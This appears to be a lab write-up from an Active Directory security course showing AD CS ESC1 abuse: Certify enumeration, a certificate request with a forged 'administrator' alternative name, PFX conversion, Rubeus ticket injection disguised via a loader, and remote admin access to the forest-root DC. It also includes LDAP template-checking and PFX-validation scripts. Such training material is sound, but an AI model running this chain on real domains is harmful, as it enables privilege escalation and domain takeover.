# CRTP Lab 21

## Task 1

Check if AD CS is used by the target forest and find any vulnerable/abusable templates.

Use Certify to enumerate the enterprise CAs in the forest. The error on the `UserSpecifiedSAN` line only means Certify could not read the CA's registry remotely with our current rights; the rest of the output is unaffected:

{% code overflow="wrap" %}

```
C:\AD\Tools\Certify.exe cas


[*] Enterprise/Enrollment CAs:

    Enterprise CA Name            : moneycorp-MCORP-DC-CA
    DNS Hostname                  : mcorp-dc.moneycorp.local
    FullName                      : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
    Cert Thumbprint               : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
    Cert Serial                   : 48D51C5ED50124AF43DB7A448BF68C49
    Cert Start Date               : 11/26/2022 1:59:16 AM
    Cert End Date                 : 11/26/2032 2:09:15 AM
    Cert Chain                    : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
    UserSpecifiedSAN              : Could not connect to the HKLM hive - Attempted to perform an unauthorized operation.
    CA Permissions                :
	
```

{% endcode %}

We can list every template, with its flags, EKUs and enrollment permissions, using `find`:

{% code overflow="wrap" %}

```
Certify.exe find


    Template Name                         : SmartCardEnrollment-Agent
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificates-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Certificate Request Agent
    mspki-certificate-application-policy  : Certificate Request Agent
    Permissions
      Enrollment Permissions
        Enrollment Rights           : dcorp\Domain Users            S-1-5-21-719815819-3726368948-3917688648-513
[snip]
    Template Name                         : HTTPSCertificates
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificates-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
[snip]
```

{% endcode %}

## Task 2

Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.

For ESC1 we look for templates with `ENROLLEE_SUPPLIES_SUBJECT` set, which lets the requester choose the subject alternative name of the certificate. Certify can filter on that flag directly:

{% code overflow="wrap" %}

```
C:\AD\Tools>C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject



    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : HTTPSCertificates
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificates-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
	  Enrollment Rights           : dcorp\RDPUsers                S-1-5-21-719815819-3726368948-3917688648-1123
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
        WriteOwner Principals       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

```

{% endcode %}

The HTTPSCertificates template has `ENROLLEE_SUPPLIES_SUBJECT` set, requires no authorized signatures and no manager approval (there is no PEND_ALL_REQUESTS in its enrollment flags), carries the Client Authentication EKU, and grants enrollment rights to dcorp\RDPUsers. That combination is ESC1.

Since the student user is a member of dcorp\RDPUsers, we can enroll in this template and put any identity we like in the certificate's subject alternative name; the CA issues the certificate without checking that we are that user.
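The same conditions that make HTTPSCertificates abusable can be checked without Certify by reading the templates and CA objects over LDAP. The following is an added example, not part of the lab notes or of the Certify project: it assumes the default right of any domain user to read the Configuration partition and uses only .NET System.DirectoryServices (Windows PowerShell 5.1 or later). The function name Get-Esc1Template is made up for this example.

```powershell
# Added example, not part of the lab notes: find ESC1 candidates straight from LDAP,
# applying the conditions Certify reports (enrollee supplies subject, no manager approval,
# no authorized signatures, logon-capable EKU, published by a CA, and who may enroll).
# Assumes the Configuration partition is readable (default for any domain user).
function Get-Esc1Template {
    $configNC = ([ADSI]"LDAP://RootDSE").configurationNamingContext
    $pkiBase  = "CN=Public Key Services,CN=Services,$configNC"

    # Template -> CA that publishes it. A template no CA publishes cannot be requested.
    $published = @{}
    $caSearch  = [System.DirectoryServices.DirectorySearcher]::new(
                     [ADSI]"LDAP://CN=Enrollment Services,$pkiBase", "(objectClass=pKIEnrollmentService)")
    foreach ($ca in $caSearch.FindAll()) {
        $caName = "{0}\{1}" -f $ca.Properties["dnshostname"][0], $ca.Properties["name"][0]
        foreach ($t in $ca.Properties["certificatetemplates"]) { $published[[string]$t] = $caName }
    }

    $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
    $CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # bit in msPKI-Enrollment-Flag: manager approval
    $logonEkus   = @("1.3.6.1.5.5.7.3.2",       # Client Authentication
                     "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
                     "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
                     "2.5.29.37.0")             # Any Purpose
    $enrollGuids = @("0e10c968-78fb-11d1-a9c0-0000f80367c1",  # Certificate-Enrollment
                     "a05b8cc2-17bc-4802-a710-e7c15ab866a2",  # Certificate-AutoEnrollment
                     "00000000-0000-0000-0000-000000000000")  # all extended rights

    $tplSearch = [System.DirectoryServices.DirectorySearcher]::new(
                     [ADSI]"LDAP://CN=Certificate Templates,$pkiBase", "(objectClass=pKICertificateTemplate)")
    foreach ($r in $tplSearch.FindAll()) {
        $name = [string]$r.Properties["cn"][0]
        if (-not $published.ContainsKey($name)) { continue }

        $nameFlag   = [int]$r.Properties["mspki-certificate-name-flag"][0]
        $enrollFlag = [int]$r.Properties["mspki-enrollment-flag"][0]
        $raSigs     = [int]$r.Properties["mspki-ra-signature"][0]
        $ekus       = @($r.Properties["pkiextendedkeyusage"] | ForEach-Object { [string]$_ })

        $suppliesSubject = ($nameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
        $needsApproval   = ($enrollFlag -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
        # An empty EKU list also allows client authentication.
        $logonCapable    = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $logonEkus -contains $_ })
        if (-not ($suppliesSubject -and -not $needsApproval -and $raSigs -eq 0 -and $logonCapable)) { continue }

        # Who may enroll: Allow ACEs granting Certificate-Enrollment / AutoEnrollment,
        # all extended rights, or GenericAll on the template object.
        $rules = $r.GetDirectoryEntry().ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])
        $enrollers = $rules | Where-Object {
            $_.AccessControlType -eq "Allow" -and (
                $_.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -or
                ($_.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -and
                 $enrollGuids -contains $_.ObjectType.ToString()))
        } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique

        [pscustomobject]@{
            CA               = $published[$name]
            Template         = $name
            EKU              = ($ekus -join ", ")
            EnrollmentRights = ($enrollers -join ", ")
        }
    }
}

Get-Esc1Template | Format-List
```

The enrollment-rights column is the part to read carefully: a template that only Domain Admins can enroll in passes every other test but is not a privilege escalation, whereas a custom group such as dcorp\RDPUsers is only interesting if we are a member of it.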

Here we request a certificate with the alternative name set to `administrator`. The CA is the one in the forest root (moneycorp.local), and the TGT obtained from this certificate is used against mcorp-dc below.

{% code overflow="wrap" %}

```
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
```

{% endcode %}

Copy everything from `-----BEGIN RSA PRIVATE KEY-----` to `-----END CERTIFICATE-----` (both lines included) from Certify's output and save it as C:\AD\Tools\esc1.pem.

Rubeus needs the key and certificate as a PFX. Convert the PEM with the bundled openssl binary and set an export password; the same password is supplied to Rubeus later. The config-file warning openssl prints does not affect the conversion.

{% code overflow="wrap" %}

```
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx

WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

```

{% endcode %}
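Before handing the PFX to Rubeus it is worth confirming that it actually contains a private key, a logon-capable EKU and the alternative name we asked for, since a PFX built from an incomplete copy of the PEM only fails at the Kerberos step. The following check is an added example, not from the lab notes or from Rubeus: it uses only the .NET X509Certificate2 class and assumes the file name and password used above. The function name Test-PkinitPfx is made up for this example.

```powershell
# Added example, not part of the lab notes: verify the PFX carries what PKINIT needs
# before running Rubeus. Path and password are the ones used in the conversion above.
function Test-PkinitPfx {
    param([string]$Path, [string]$Password)

    $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList $Path, $Password
    $problems = @()

    if (-not $cert.HasPrivateKey) { $problems += "no private key: the BEGIN/END RSA PRIVATE KEY block was probably not copied into the PEM" }
    if ($cert.NotAfter -lt (Get-Date)) { $problems += "certificate expired on $($cert.NotAfter)" }

    # EKU: PKINIT accepts Client Authentication, Smart Card Logon, PKINIT Client Auth, Any Purpose, or no EKU at all
    $ekuExt = $cert.Extensions | Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509EnhancedKeyUsageExtension] }
    $ekus   = @()
    if ($ekuExt) { $ekus = @($ekuExt.EnhancedKeyUsages | ForEach-Object { $_.Value }) }
    $logonEkus = @("1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2", "1.3.6.1.5.2.3.4", "2.5.29.37.0")
    if ($ekus.Count -gt 0 -and -not ($ekus | Where-Object { $logonEkus -contains $_ })) {
        $problems += "no logon-capable EKU (found: $($ekus -join ', '))"
    }

    # SAN (OID 2.5.29.17) is where /altname ends up; the DC maps the UPN in it to the account the TGT is issued for
    $sanExt  = $cert.Extensions | Where-Object { $_.Oid.Value -eq "2.5.29.17" }
    $sanText = ""
    if ($sanExt) { $sanText = $sanExt.Format($false) } else { $problems += "no Subject Alternative Name: the altname was not honoured" }

    [pscustomobject]@{
        Subject  = $cert.Subject
        Issuer   = $cert.Issuer
        NotAfter = $cert.NotAfter
        EKU      = ($ekus -join ", ")
        SAN      = $sanText
        Problems = ($problems -join "; ")
    }
}

Test-PkinitPfx -Path C:\AD\Tools\esc1-DA.pfx -Password "SecretPass@123" | Format-List
```

An empty Problems field and a SAN line naming the account we requested means the Rubeus step below should succeed; the SAN text is also what to compare against the `/user` value given to Rubeus.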

Use the PFX created above with Rubeus (asktgt) to request a TGT for administrator over PKINIT and inject it into the current session (/ptt). The password is the export password set during the openssl conversion:

{% code overflow="wrap" %}

```
# %Pwn% holds "asktgt", set with ArgSplit so the literal string does not appear on the command line

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
```

{% endcode %}

With the TGT in the session, we can access mcorp-dc as Administrator over WinRM:

{% code overflow="wrap" %}

```
C:\AD\Tools>winrs -r:mcorp-dc cmd /c set username
USERNAME=Administrator


C:\AD\Tools>winrs -r:mcorp-dc cmd /c set computername
COMPUTERNAME=MCORP-DC


C:\AD\Tools>
```

{% endcode %}
